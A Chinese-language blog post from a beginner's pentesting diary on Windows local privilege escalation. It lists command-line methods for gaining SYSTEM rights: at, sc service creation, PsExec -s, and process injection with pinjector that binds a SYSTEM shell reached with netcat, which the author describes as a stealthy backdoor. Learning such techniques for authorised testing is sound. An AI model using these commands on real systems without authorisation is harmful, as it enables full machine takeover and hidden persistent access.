小白日记21:kali渗透测试之提权(一)--本地提权

时间:2022-12-04 17:13:21
本地提权
简单地说,本地提权漏洞就是说一个本来非常低权限、受限制的用户,可以提升到系统至高无上的权限。权限提升漏洞通常是一种“辅助”性质的漏洞,当黑客已经通过某种手段进入了目标机器后,可以利用他进入更高的状态。但并不是说这种漏洞不严重、难以利用,往往这种漏洞更容易被利用、带来的后果比远程漏洞更可怕,这种漏洞实际上远比远程漏洞稀有,往往一个微软本地提权漏洞在国外的价格就可以到几百万美金。因为远程漏洞其实是很普遍的,一个网站存在网页问题,就可能被篡改,传入WEBSHELL(一种控制网站机器的网页控制端),但此时权限是非常低的,黑客无法种植木马,控制目标机器,也无法渗透到服务器更深层的机器,在企业内网和这个内网也是这样,通常这些网络环境中都有用户权限控制,即使误中木马,也不会造成影响,更无法传播,但是上面这些在存在提权漏洞的机器上都是可以彻底突破的。
 
 
Windows系统用户权限划分:
Administrators,管理员组,默认情况下,Administrators中的用户对计算机/域有不受限制的完全访问权。分配给该组的默认权限允许对整个系统进行完全控制。所以,只有受信任的人员才可成为该组的成员。 
Users:普通用户组,这个组的用户无法进行有意或无意的改动。因此,用户可以运行经过验证的应用程序,但不可以运行大多数旧版应用程序。Users 组是最安全的组,因为分配给该组的默认权限不允许成员修改操作系统的设置或用户资料。Users 组提供了一个最安全的程序运行环境。在经过 NTFS 格式化的卷上,默认安全设置旨在禁止该组的成员危及操作系统和已安装程序的完整性。用户不能修改系统注册表设置、操作系统文件或程序文件。Users 可以关闭工作站,但不能关闭服务器。Users 可以创建本地组,但只能修改自己创建的本地组。 
System:拥有和Administrators一样、甚至比其还高的权限,但是这个组不允许任何用户的加入,在察看用户组的时候,它也不会被显示出来,它就是SYSTEM组。系统和系统级的服务正常运行所需要的权限都是靠它赋予的。
 

Linux系统用户权限划分

Users:普通用户

Root:管理员账号

windows系统下提权【可用命令行,也可用图形化界面】

net命令

小白日记21:kali渗透测试之提权(一)--本地提权

#HelpAssistant:用于远程协助的账号;##SUPPORT——338945a0:用于支持

net user Xuan ##可查看当前账号信息

小白日记21:kali渗透测试之提权(一)--本地提权

提权:【管理员权限提升为System权限】

1、at命令【at /?】##只能在XP与2003的系统上使用

at <time> /interactive cmd   ##指定时间,使用交互命令防止在后台运行

小白日记21:kali渗透测试之提权(一)--本地提权

小白日记21:kali渗透测试之提权(一)--本地提权

###使用taskmgr命令杀死现用户桌面进程,重启,则整个界面都在管理员

小白日记21:kali渗透测试之提权(一)--本地提权

小白日记21:kali渗透测试之提权(一)--本地提权小白日记21:kali渗透测试之提权(一)--本地提权

则此时使用任何操作都是在System账号下

2、sc命令##可在win7、win8上使用【原理:创建一个服务(默认情况工作在system账号下)】

sc Create syscmd binPath= "cmd /K start" type= own type= interact【重启一个命令行窗口 类型为拥有】

默认情况下没启动

命令行下可用sc start syscmd

3、

windows系统有提供一个套件【搞windows系统的人都应该去学习该套件的使用】

https://technet.microsoft.com/en-us/sysinternals/bb545027  参考书籍:windows internals

###whoami插件,复制到C盘system32,运行

###PsExec.exe -i -s cmd  【-i交互模式,-s使用system账号】

4、注入进程提权【相当于开了一个后门,隐蔽性极高】

将进程注入system服务进程

pinjector.exe进程注入器

http://www.tarasco.org/security/Process_Injector/

###pinjector.exe -l#查看可注入进程

###pinjector.exe -p <PID> cmd <ports>

nc -nv <IP> <ports>

小白日记,未完待续……